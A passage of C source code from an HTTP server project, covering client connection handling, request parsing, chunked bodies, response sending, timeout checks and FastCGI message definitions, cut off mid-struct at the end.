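     $datetime              ->  "2021-01-02 03:04:05"
     $datetime[createtime]  ->  same format, using the message create time
     $datetime[stamp]       ->  same format, using the message stamp
     $date                  ->  "2021-01-02"
     $date[compact]         ->  "20210102"
     $time                  ->  "03:04:05"
*/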
void * var_obj_alloc()
{
var_obj_t * obj = NULL;
obj = kzalloc(sizeof(*obj));
if (!obj) return NULL;
return obj;
}
void var_obj_free (void * vobj)
{
var_obj_t * obj = (var_obj_t *)vobj;
if (!obj) return;
if (obj->name) kfree(obj->name);
if (obj->value) kfree(obj->value);
kfree(obj);
}
int var_obj_cmp_name (void * a, void * b)
{
var_obj_t * obj = (var_obj_t *)a;
char * name = (char *)b;
if (!obj) return -1;
if (!name) return 1;
return str_casecmp(obj->name, name);
}
<|start_filename|>src/http_cli_io.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_pump.h"
#include "http_cli_io.h"
#include "http_listen.h"
#include "http_request.h"
#include "http_handle.h"
#include "http_proxy.h"
#include "http_srv.h"
#include "http_chunk.h"
#include "http_ssl.h"
#include "http_variable.h"
#include "http_form.h"
#include "http_cache.h"
#include "http_cc.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_con.h"
#include "http_fcgi_io.h"
int http_cli_con_crash (void * vcon, int closelad)
{
HTTPCon * clicon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * climsg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!clicon) return -1;
mgmt = (HTTPMgmt *)clicon->mgmt;
if (!mgmt) return -2;
climsg = http_con_msg_first(clicon);
if (!closelad || !climsg)
return http_con_close(clicon);
if (climsg->proxied == 1 && (srvmsg = climsg->proxymsg)) {
srvcon = http_mgmt_con_get(mgmt, srvmsg->conid);
if (srvcon)
http_con_close(srvcon);
}
else if (climsg->fastcgi == 1 && (cgimsg = climsg->fcgimsg)) {
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
if (cgicon)
http_fcgicon_close(cgicon);
}
else if (clicon->httptunnel && clicon->tunnelcon) {
http_con_close(clicon->tunnelcon);
}
return http_con_close(clicon);
}
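/* Callback invoked when a listening device becomes readable: accepts every pending
   TCP connection, allocates an HTTPCon for each one, records the peer and local
   addresses, starts the SSL handshake when the listener is configured for TLS,
   arms the per-connection life timer and binds the device to the current epump. */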
int http_cli_accept (void * vmgmt, void * listendev)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
int ret = 0;
void * pdev = NULL;
HTTPListen * hl = NULL;
if (!mgmt) return -1;
hl = iodev_para(listendev);
if (!hl) return -2;
while (1) {
pdev = eptcp_accept(mgmt->pcore, listendev,
(void *)NULL, &ret,
http_pump, mgmt, BIND_NONE);
if (pdev == NULL) {
return 0;
}
pcon = http_con_fetch(mgmt);
if (!pcon) {
iodev_close(pdev);
return -100;
}
pcon->pdev = pdev;
iodev_para_set(pdev, (void *)pcon->conid);
pcon->hl = hl;
pcon->casetype = HTTP_SERVER;
pcon->reqdiag = hl->reqdiag;
pcon->reqdiagobj = hl->reqdiagobj;
pcon->ssl_link = hl->ssl_link;
str_cpy(pcon->srcip, iodev_rip(pcon->pdev));
str_cpy(pcon->dstip, iodev_lip(pcon->pdev));
pcon->srcport = iodev_rport(pcon->pdev);
pcon->dstport = iodev_lport(pcon->pdev);
pcon->createtime = time(&pcon->stamp);
pcon->transbgn = pcon->stamp;
pcon->rcv_state = HTTP_CON_READY;
pcon->snd_state = HTTP_CON_SEND_READY;
#ifdef HAVE_OPENSSL
if (pcon->ssl_link) {
pcon->sslctx = http_listen_ssl_ctx_get(hl);
pcon->ssl = http_ssl_new(pcon->sslctx, pcon);
pcon->ssl_handshaked = 0;
pcon->rcv_state = HTTP_CON_SSL_HANDSHAKING;
}
#endif
if (pcon->life_timer)
iotimer_stop(pcon->life_timer);
/* the upcoming R/W events from pcon and the timeout events of life_timer will
   be pipelined and delivered to the current thread. This may seem to reduce the
   efficiency of concurrent execution on multiple CPUs, but it lowers the risk of
   blocking and lock contention */
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_cli_con_life, (void *)pcon->conid,
http_pump, mgmt);
iodev_bind_epump(pdev, BIND_CURRENT_EPUMP, NULL);
}
return 0;
}
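/* Read-ready handler of a client connection: applies receive-side congestion
   control, reads all available data into rcvstream, relays it to the peer if the
   connection is an HTTP tunnel, otherwise parses it into HTTPMsg instances and
   dispatches every complete, non-proxied request to http_msg_handle. */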
int http_cli_recv (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
ulong conid = 0;
int ret = 0, num = 0;
int err = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* If the client-side receiving speed is greater than the server-side sending
   speed, a great deal of data will pile up in memory. Congestion control is
   activated by ignoring the read-ready event; the receive buffer of the
   underlying TCP connection will then fill up and the TCP stack will start
   its congestion-control mechanism */
if (http_cli_recv_cc(pcon) > 0)
return 0;
conid = pcon->conid;
while (1) {
ret = http_con_read(pcon, pcon->rcvstream, &num, &err);
if (ret < 0) {
http_cli_con_crash(pcon, 1);
return -100;
}
time(&pcon->stamp);
if (pcon->read_ignored > 0)
pcon->read_ignored = 0;
if (num > 0) {
http_overhead_recv(mgmt, num);
} else if (frameL(pcon->rcvstream) <= 0) {
/* no data in socket and rcvstream, just return and
wait for Read-Ready notify */
return 0;
}
num = frameL(pcon->rcvstream);
if (pcon->httptunnel && pcon->tunnelself == 0) {
ret = http_tunnel_srv_send(pcon, pcon->tunnelcon);
if (ret < 0) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
}
return ret;
}
ret = http_cli_recv_parse(pcon);
if (ret < 0) {
http_cli_con_crash(pcon, 1);
return ret;
} else if (ret == 0) {
return 0;
} else {
/* pcon->msg stores the msg instance currently being received.
   pcon may hold several earlier msg instances that are still being
   handled by the callback function before this one.
 */
/* msg = http_con_msg_last(pcon); */
msg = pcon->msg;
pcon->msg = NULL;
if (!msg) continue;
if (msg && msg->proxied == 0) {
http_msg_handle(pcon, msg);
if (http_mgmt_con_get(mgmt, conid) != pcon)
return 0;
}
}
} //end while (1)
return 0;
}
/* return value:
 *   -1   : invalid entry argument
 *   -101 : no HTTPMsg instance exists while waiting for the body
 *   -102 : parsing the body failed while waiting for the body
 *   -103 : HTTPMsg body-flag indicates no body, but the connection is actually in waiting-body state
 *   -104 : request header is too large, possibly a malicious attack
 *   -105 : HTTPMsg allocation failed
 *   -106 : parsing the request header failed while waiting for the header
 *   -107 : parsing the body failed while waiting for the header
 *   -108 : HTTPMsg body-flag is invalid or erroneous
 *   -116 : request verification failed
 *   0    : only a partial request was received, need to wait for more data
 *   1    : complete HTTP request with body data parsed successfully
 *   2    : complete HTTP request without body data parsed successfully
 */
int http_cli_recv_parse (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
HTTPMgmt * mgmt = NULL;
int ret = 0;
long num = 0;
int64 hdrlen = 0;
uint8 * pbyte = NULL;
uint8 * pbgn = NULL;
char buf[2048];
HTTPMsg * proxymsg = NULL;
FcgiMsg * cgimsg = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
num = frameL(pcon->rcvstream);
if (num <= 0) {
return 0;
}
if (pcon->rcv_state == HTTP_CON_READY) {
pcon->rcv_state = HTTP_CON_WAITING_HEADER;
}
if (pcon->rcv_state == HTTP_CON_WAITING_BODY) {
/* either of the following two ways of obtaining the msg is valid */
/* msg = http_con_msg_first(pcon); */
msg = pcon->msg;
if (!msg) {
return -101;
}
msg->stamp = time(0);
/* if the msg is being proxied, pass the received body on via http_proxy_srv_send */
if (msg->proxied) {
proxymsg = msg->proxymsg;
if (proxymsg && proxymsg->pcon)
http_proxy_srv_send(proxymsg->pcon, proxymsg);
return 0;
} else if (msg->fastcgi) {
cgimsg = msg->fcgimsg;
if (cgimsg && cgimsg->pcon)
http_fcgi_srv_send(cgimsg->pcon, cgimsg);
return 0;
}
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
case BC_TE:
ret = http_cli_reqbody_parse(pcon, msg);
if (ret < 0) {
return -102;
} else if (ret == 0) { //waiting more body
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
return 1;
}
break;
default:
return -103;
}
} else {
pbgn = frameP(pcon->rcvstream);
/* determine if http header got completely */
pbyte = kmp_find_bytes(pbgn, num, "\r\n\r\n", 4, NULL);
if (!pbyte) {
if (num > mgmt->cli_max_header_size) {
/* request header is too large, possibly a malicious attack */
return -104;
}
pcon->rcv_state = HTTP_CON_WAITING_HEADER;
return 0;
}
hdrlen = pbyte + 4 - pbgn;
pcon->msg = msg = http_msg_fetch(mgmt);
if (!msg) {
return -105;
}
msg->msgtype = 1; //receiving request
pcon->reqnum++;
msg->pcon = pcon;
msg->hl = pcon->hl;
msg->conid = pcon->conid;
strcpy(msg->srcip, pcon->srcip);
strcpy(msg->dstip, pcon->dstip);
msg->srcport = pcon->srcport;
msg->dstport = pcon->dstport;
msg->ssl_link = pcon->ssl_link;
msg->state = HTTP_MSG_REQUEST_RECVING;
msg->req_header_length = hdrlen;
if (hdrlen > 0) {
/* remove the last 2 trailer "\r\n" */
frame_put_nlast(msg->req_header_stream, pbgn, hdrlen-2);
frame_del_first(pcon->rcvstream, hdrlen);
}
msg->req_stream_recv += hdrlen;
ret = http_req_parse_header(msg);
if (ret < 0) return -106;
/* the request line contains only path/query and the uri lacks scheme/host;
 * complete it from the Host header to form one full uri */
http_req_set_absuri(msg);
/* add to the msg queue of current HTTPCon for pipeline handling or tracing */
http_con_msg_add(pcon, msg);
pcon->keepalive = msg->req_conn_keepalive;
if (http_req_verify(msg) < 0) {
return -116;
}
/* set DocURI and match the request path with configured Host and Location */
if (msg->req_url_type == 0 && msg->req_methind != HTTP_METHOD_CONNECT) { //exclude CONNECT method
http_req_set_docuri(msg, frameP(msg->uri->uri), frameL(msg->uri->uri), 0, 0);
}
/* if set the check callback, all requests including proxy mode will be checked */
if (mgmt->req_check) {
msg->GetRealFile(msg, buf, sizeof(buf)-1);
(*mgmt->req_check)(mgmt->req_checkobj, msg, buf);
}
/* determine if request body is following, set the rcv_state of HTTPCon */
if ( ( msg->req_body_flag == BC_CONTENT_LENGTH &&
msg->req_body_length > 0 ) ||
msg->req_body_flag == BC_TE)
{
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
}
#if defined _DEBUG
print_request(msg, stdout);
#endif
if (http_proxy_handle(msg) >= 0)
return 0;
if (http_fcgi_handle(msg) >= 0)
return 0;
return http_reqbody_handle(msg);
}
return 0;
}
int http_reqbody_handle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPCon * pcon = NULL;
int ret = 0;
if (!msg) return -1;
pcon = (HTTPCon *)msg->pcon;
if (!pcon) return -2;
/* HTTP POST/PUT request body may be encoded as following enctype:
(1) application/x-www-form-urlencoded
(2) multipart/form-data
(3) application/json
(4) text/xml
(5) application/octet-stream
*/
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
case BC_TE:
ret = http_cli_reqbody_parse(pcon, msg);
if (ret < 0) {
return -107;
} else if (ret == 0) { //waiting more body
pcon->rcv_state = HTTP_CON_WAITING_BODY;
} else {
pcon->rcv_state = HTTP_CON_READY;
return 1;
}
break;
case BC_TE_INVALID:
case BC_UNKNOWN:
return -108;
case BC_NONE:
case BC_TUNNEL:
default:
pcon->rcv_state = HTTP_CON_READY;
return 2;
break;
}
return 0;
}
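/* Consume the request body accumulated in pcon->rcvstream according to the body
   flag (Content-Length or Transfer-Encoding: chunked), spooling it to a cache file
   once it exceeds the configured threshold. Returns a negative value on error,
   0 when more data is needed, and 1 when the whole body has been received, after
   which multipart, form-urlencoded and JSON bodies are decoded. */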
int http_cli_reqbody_parse (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
char * pbody = NULL;
int bodylen = 0;
int64 restlen = 0;
int ret, rmlen = 0;
if (!pcon) return -1;
if (!msg) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
pbody = frameP(pcon->rcvstream);
bodylen = frameL(pcon->rcvstream);
switch (msg->req_body_flag) {
case BC_CONTENT_LENGTH:
restlen = msg->req_body_length - msg->req_body_iolen;
if (bodylen >= restlen)
bodylen = restlen;
if (mgmt->cli_body_cache &&
msg->req_body_length >= mgmt->cli_body_cache_threshold &&
!msg->req_file_handle)
{
http_request_cache_init(msg);
if (msg->req_file_handle) {
frame_filefd_write(msg->req_body_stream, native_file_fd(msg->req_file_handle), 0);
frame_empty(msg->req_body_stream);
}
}
if (msg->req_file_cache && msg->req_file_handle) {
native_file_write(msg->req_file_handle, pbody, bodylen);
} else {
frame_put_nlast(msg->req_body_stream, pbody, bodylen);
}
frame_del_first(pcon->rcvstream, bodylen);
msg->req_body_iolen += bodylen;
msg->req_stream_recv += bodylen;
if (msg->req_body_iolen >= msg->req_body_length) {
goto gotallbody;
}
return 0;
case BC_TE:
/* Chunk format is as follows:
 * 24E5CRLF            #chunk-sizeCRLF (first chunk begins)
 * 24E5(byte)CRLF      #(chunk-size octets)CRLF
 * 38A1CRLF            #chunk-sizeCRLF (another chunk begins)
 * 38A1(byte)CRLF      #(chunk-size octets)CRLF
 * ......              #more chunks may follow
 * 0CRLF               #end of all chunks
 * X-bid-for: abcCRLF  #zero or more HTTP headers as trailer
 * .....               #more HTTP headers, each with trailing CRLF
 * CRLF
 */
if (http_chunk_gotall(msg->req_chunk))
return 1;
ret = http_chunk_add_bufptr(msg->req_chunk, pbody, bodylen, &rmlen);
if (ret < 0) return -30;
msg->req_chunk_iolen += chunk_rest_size(http_chunk_obj(msg->req_chunk), 0);
msg->req_body_length += chunk_rest_size(http_chunk_obj(msg->req_chunk), 0);
if (mgmt->cli_body_cache &&
msg->req_body_length >= mgmt->cli_body_cache_threshold &&
!msg->req_file_handle)
{
http_request_cache_init(msg);
if (msg->req_file_handle) {
frame_filefd_write(msg->req_body_stream, native_file_fd(msg->req_file_handle), 0);
frame_empty(msg->req_body_stream);
}
}
if (msg->req_file_handle) {
chunk_readto_file(http_chunk_obj(msg->req_chunk), native_file_fd(msg->req_file_handle), 0, -1, 0);
} else {
chunk_readto_frame(http_chunk_obj(msg->req_chunk), msg->req_body_stream, 0, -1, 0);
}
chunk_remove(http_chunk_obj(msg->req_chunk), msg->req_body_length, 0);
msg->req_stream_recv += rmlen;
if (rmlen > 0)
frame_del_first(pcon->rcvstream, rmlen);
if (http_chunk_gotall(msg->req_chunk)) {
goto gotallbody;
}
return 0;
default:
return -10;
}
return 0;
gotallbody:
if (msg->req_file_handle) {
chunk_add_filefd(msg->req_body_chunk,
native_file_fd(msg->req_file_handle),
0, -1);
} else {
chunk_add_bufptr(msg->req_body_chunk,
frameP(msg->req_body_stream),
frameL(msg->req_body_stream), NULL);
}
http_form_multipart_parse(msg, NULL);
if (msg->req_content_type && msg->req_contype_len > 0) {
if (strncasecmp(msg->req_content_type, "application/x-www-form-urlencoded", 33) == 0) {
if (!msg->req_form_kvobj) {
msg->req_form_kvobj = kvpair_init(37, "&", "=");
}
chunk_ptr(msg->req_body_chunk, 0, NULL, (void **)&pbody, &restlen);
kvpair_decode(msg->req_form_kvobj, pbody, restlen);
} else if (strncasecmp(msg->req_content_type, "application/json", 16) == 0) {
if (!msg->req_form_json) {
msg->req_form_json = json_init(0, 0, 0);
}
chunk_ptr(msg->req_body_chunk, 0, NULL, (void **)&pbody, &restlen);
json_decode(msg->req_form_json, pbody, restlen, 1, 0);
}
}
return 1;
}
int http_cli_send_probe (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
int num = 0;
if (!pcon) return -1;
if (pcon->snd_state < HTTP_CON_SEND_READY) return -100;
num = arr_num(pcon->msg_list);
if (num <= 0) {
if (pcon->snd_state == HTTP_CON_FEEDING)
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
msg = (HTTPMsg *)arr_value(pcon->msg_list, 0);
if (!msg || msg->issued <= 0) {
if (pcon->snd_state == HTTP_CON_FEEDING)
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
if (pcon->snd_state == HTTP_CON_FEEDING) {
return 0;
}
iodev_add_notify(pcon->pdev, RWF_WRITE);
return 0;
}
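/* Write-ready handler of a client connection: feeds the response body chunk of
   the first queued HTTPMsg to the socket via writev or sendfile (with optional
   chunked transfer encoding), applies send-side de-congestion, and removes and
   closes the message once the complete response has been delivered. */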
int http_cli_send (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
void * chunk = NULL;
chunk_vec_t iovec;
uint8 httpchunk = 0;
int ret = 0;
int64 filepos = 0;
int64 sentnum = 0;
int num = 0;
int err = 0;
uint8 shutdown = 0;
uint8 closecon = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
if (pcon->snd_state < HTTP_CON_SEND_READY)
return -100;
if (pcon->httptunnel && pcon->tunnelself == 0 && arr_num(pcon->msg_list) <= 0)
return http_tunnel_cli_send(pcon->tunnelcon, pcon);
if (pcon->snd_state == HTTP_CON_FEEDING)
return 0;
pcon->snd_state = HTTP_CON_FEEDING;
while (arr_num(pcon->msg_list) > 0 &&
pcon->snd_state == HTTP_CON_FEEDING)
{
msg = http_con_msg_first(pcon);
if (!msg) {
pcon->snd_state = HTTP_CON_SEND_READY;
break;
}
if (msg->proxied && (!msg->cacheon || !msg->res_cache_info)) {
httpchunk = 0;
} else {
httpchunk = msg->res_body_flag == BC_TE ? 1 : 0;
}
chunk = msg->res_body_chunk;
filepos = msg->res_stream_sent;
if (msg->issued <= 0 || chunk_get_end(chunk, filepos, httpchunk)) {
/* if the request callback has not finished handling, or the response
   has already been sent to the client, just do nothing and return */
pcon->snd_state = HTTP_CON_SEND_READY;
return 0;
}
if (chunk_has_file(chunk) > 0) {
if (iodev_tcp_nodelay(pcon->pdev) == TCP_NODELAY_SET) {
iodev_tcp_nodelay_set(pcon->pdev, TCP_NODELAY_UNSET);
}
if (iodev_tcp_nopush(pcon->pdev) == TCP_NOPUSH_UNSET) {
iodev_tcp_nopush_set(pcon->pdev, TCP_NOPUSH_SET);
}
}
for (sentnum = 0; chunk_get_end(chunk, filepos, httpchunk) == 0; ) {
memset(&iovec, 0, sizeof(iovec));
ret = chunk_vec_get(chunk, filepos, &iovec, httpchunk);
if (ret < 0 || (iovec.size > 0 && iovec.vectype != 1 && iovec.vectype != 2)) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
if (iovec.size == 0) {
/* no available data to send, waiting for more data... */
pcon->snd_state = HTTP_CON_SEND_READY;
/* all buffered octets have been sent to the client, so the de-congestion
   process should start: the server-side connection is checked and its Read
   notification re-added if it was removed earlier */
http_cli_send_cc(pcon);
if (msg->cacheon && msg->res_cache_info) {
/* read cache file again, if no data in cache file, request it from origin */
return http_proxy_cli_cache_send(pcon, msg);
}
return 0;
}
err = 0;
if (iovec.vectype == 2) { //sendfile
#if defined(_WIN32) || defined(_WIN64)
ret = http_con_sendfile(pcon, (int)iovec.filefd, iovec.fpos, iovec.size , &num, &err);
#else
ret = http_con_sendfile(pcon, iovec.filefd, iovec.fpos, iovec.size , &num, &err);
#endif
if (ret < 0) {
shutdown = 1;
}
} else if (iovec.vectype == 1) { //mem buffer, writev
ret = http_con_writev(pcon, iovec.iovs, iovec.iovcnt, &num, &err);
if (ret < 0) {
shutdown = 1;
}
}
filepos += num;
msg->res_stream_sent += num;
sentnum += num;
http_overhead_sent(pcon->mgmt, num);
msg->stamp = time(&pcon->stamp);
/* remove the sent ChunkEntity-es in msg->res_body_chunk.
release the already sent frame objects holding received data from
origin server for zero-copy purpose. */
http_cli_send_final(msg);
if (shutdown) break;
#ifdef UNIX
if (err == EINTR || err == EAGAIN || err == EWOULDBLOCK) { //EAGAIN
#elif defined(_WIN32) || defined(_WIN64)
if (err == WSAEWOULDBLOCK) {
#else
if (num == 0) {
#endif
pcon->snd_state = HTTP_CON_SEND_READY;
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* all buffered octets have been sent to the client, so the de-congestion
   process should start: the server-side connection is checked and its Read
   notification re-added if it was removed earlier */
if (sentnum > 0)
http_cli_send_cc(pcon);
return 0;
}
}
if (chunk_get_end(chunk, msg->res_stream_sent, httpchunk) == 1) {
if (msg->res_status >= 400)
closecon++;
if (msg->req_ver_major < 1 || (msg->req_ver_major == 1 && msg->req_ver_minor == 0))
closecon++;
/* send response to client successfully */
http_con_msg_del(pcon, msg);
http_msg_close(msg);
pcon->transbgn = time(NULL);
/* go on sending another HTTPMsg */
}
if (shutdown) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
} //end while
if (closecon) {
pcon->snd_state = HTTP_CON_IDLE;
http_cli_con_crash(pcon, 1);
return ret;
}
pcon->snd_state = HTTP_CON_SEND_READY;
/* the response has been sent to client. the current HTTPCon
* should send the next HTTPMsg in the FIFO queue. */
if (arr_num(pcon->msg_list) > 0) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
}
return 0;
}
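/* Housekeeping after data has been written to the client: remove the already-sent
   ChunkEntity items from res_body_chunk and free any receive frames in
   res_rcvs_list that the chunk no longer references (zero-copy buffers borrowed
   from the origin side). */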
int http_cli_send_final (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
frame_p frm = NULL;
int i, num;
int fnum = 0;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
fnum = chunk_remove(msg->res_body_chunk,
msg->res_stream_sent,
msg->res_body_flag == BC_TE ? 1 : 0);
if (fnum <= 0)
return 0;
num = arr_num(msg->res_rcvs_list);
for (i = 0; i < num; i++) {
frm = arr_value(msg->res_rcvs_list, i);
fnum = chunk_bufptr_porig_find(msg->res_body_chunk, frm);
if (fnum <= 0) {
arr_delete(msg->res_rcvs_list, i);
frame_free(frm);
i--; num--;
}
}
return 1;
}
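/* Periodic life-check of a client connection: closes the connection when the
   tunnel keepalive time, client keepalive or idle time, SSL-handshake or
   header-receiving limits, or the request-handling time is exceeded, and then
   re-arms the life timer. */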
int http_cli_con_lifecheck (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
time_t curt = 0;
int num = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
num = arr_num(pcon->msg_list);
time(&curt);
if (pcon->httptunnel) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->tunnel_keepalive_time) {
return http_con_close(pcon);
}
goto starttimer;
}
if (num <= 0) { //before one complete header is received, or after the response has been sent
if (pcon->rcv_state <= HTTP_CON_READY) {
if (pcon->reqnum > 0) {
/* after one or more request/response transactions, now waiting a while
   for new incoming request data from the client. */
if (pcon->keepalive) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_keepalive_time) {
/* one or more requests have been handled, but no new request has
   arrived within the keepalive time */
return http_con_close(pcon);
}
} else {
/* one or more requests have been handled; close the connection
   since keepalive is not enabled */
return http_con_close(pcon);
}
} else if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_conn_idle_time) {
/* the connection was established but no request has come in */
return http_con_close(pcon);
}
} else if (pcon->rcv_state == HTTP_CON_SSL_HANDSHAKING) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_header_time) {
/* the SSL handshake is in progress and has lasted too long */
return http_con_close(pcon);
}
} else if (pcon->rcv_state == HTTP_CON_WAITING_HEADER) {
/* has got partial HTTP-request header */
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_header_idletime) {
/* a partial request header was received, but no further bytes have arrived for some time */
return http_con_close(pcon);
} else if (pcon->stamp > pcon->transbgn &&
pcon->stamp - pcon->transbgn >= mgmt->cli_header_time)
{
/* a full request header has not been received since the first byte;
   close the connection when the maximum waiting time is exceeded */
return http_con_close(pcon);
}
}
} else { //num > 0, after got one complete request header, before replying succ
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_request_handle_time) {
/* the header has been received; waiting for proxy or upper-layer callback handling */
return http_con_close(pcon);
}
}
starttimer:
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_cli_con_life, (void *)pcon->conid,
http_pump, mgmt);
return 0;
}
<|start_filename|>include/http_pump.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_PUMP_H_
#define _HTTP_PUMP_H_
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP system pump: the callback for all device events and timer timeout events */
int http_pump (void * vmgmt, void * vobj, int event, int fdtype);
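/* http_pump is passed as the event callback wherever devices or timers are
   created, e.g. in http_cli_accept:
       eptcp_accept(mgmt->pcore, listendev, NULL, &ret, http_pump, mgmt, BIND_NONE);
       iotimer_start(mgmt->pcore, mgmt->conn_check_interval * 1000,
                     t_http_cli_con_life, (void *)pcon->conid, http_pump, mgmt);
 */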
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_msg.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FASTCGI_MSG_H_
#define _HTTP_FASTCGI_MSG_H_
#include "http_msg.h"
#include "http_fcgi_srv.h"
#ifdef __cplusplus
extern "C" {
#endif
/* About specification of FastCGI, please refer to
http://www.mit.edu/~yandros/doc/specs/fcgi-spec.html */
#define FCGI_PROTO_VERSION 0x01
#define FCGI_CONTENT_MAX 65535
/* Values for type component of FCGI_Header */
#define FCGI_BEGIN_REQUEST 1
#define FCGI_ABORT_REQUEST 2
#define FCGI_END_REQUEST 3
#define FCGI_PARAMS 4
#define FCGI_STDIN 5
#define FCGI_STDOUT 6
#define FCGI_STDERR 7
#define FCGI_DATA 8
#define FCGI_GET_VALUES 9
#define FCGI_GET_VALUES_RESULT 10
#define FCGI_UNKNOWN_TYPE 11
#define FCGI_MAXTYPE (FCGI_UNKNOWN_TYPE)
/* Values for role component of FCGI_BeginRequestBody */
#define FCGI_RESPONDER 1
#define FCGI_AUTHORIZER 2
#define FCGI_FILTER 3
/* Values for protocolStatus component of FCGI_EndRequestBody */
#define FCGI_REQUEST_COMPLETE 0
#define FCGI_CANT_MPX_CONN 1
#define FCGI_OVERLOADED 2
#define FCGI_UNKNOWN_ROLE 3
/* Variable names for FCGI_GET_VALUES / FCGI_GET_VALUES_RESULT records */
#define FCGI_MAX_CONNS "FCGI_MAX_CONNS"
#define FCGI_MAX_REQS "FCGI_MAX_REQS"
#define FCGI_MPXS_CONNS "FCGI_MPXS_CONNS"
typedef struct fastcgi_header {
uint8 version;
uint8 type;
uint16 reqid;
uint16 contlen;
uint8 padding;
uint8 reserved;
/* parsing state of receiving FastCGI stream */
uint8 wait_more_data;
uint16 data_to_read;
uint16 body_to_read;
uint8 padding_to_read;
} FcgiHeader, fcgi_header_t;
typedef struct fastcgi_msg_s {
uint16 msgid;
HTTPMsg * httpmsg;
int req_body_flag; //BC_CONTENT_LENGTH or BC_TE
int64 req_body_length;
int64 req_body_iolen;
int64 req_stream_sent; //total sent length including header and body
uint8 reqsent; //0-not sent or in sending 1-already sent
/* to achieve zero-copy for higher performance, the frame buffers of HTTPCon,
   which store octets read from the socket, are moved into the following list
   for further parsing or handling. This lessens the memory-copy overhead
   significantly. */
arr_t * req_rcvs_list;
/* the fragmented data blocks to be sent to CGI-Server are stored in chunk_t */
chunk_t * req_body_chunk;
unsigned fcgi_role : 16;
unsigned fcgi_keep_alive : 1;
/* encoded octet stream for a fastcgi request :
begin_request_header(01 01 00 01 00 08 00 00) (8 bytes)
begin_request_body (00 01 00 00 00 00 00 00) (8 bytes)
fcgi_params_header (01 04 00 01 XX XX YY 00) (8 bytes)
.................. (XXXX paralen bytes)
padding 0 (YY bytes for 8-byte alignment)
fcgi_params_header (01 04 00 01 00 00 00 00) (8 bytes, 0-length params content)
*/
frame_p fcgi_request;
int req_header_length;
/* if an HTTP request body exists and is large enough, it may take one or more
   FCGI_STDIN records, each carrying a body of at most 65535 bytes.
   at most 32 FCGI_STDIN records are prepared for the segments of a streamed HTTP request body.
   fcgi_stdin_header (01 05 00 01 XX XX YY 00) (8 bytes, present if a request body exists)
   .................. (XXXX bytes of request body content)
padding 0 (YY bytes for 8-byte alignment)
fcgi_stdin_header (01 05 00 01 00 00 00 00) (8 bytes, 0-length stdin content)
*/
int fcgi_stdin_num;
uint8 fcgi_stdin_header[32][8];
uint8 * fcgi_stdin_body[32];
int fcgi_stdin_body_len[32];
uint8 * fcgi_stdin_padding[32];
int fcgi_stdin_padding_len[32];
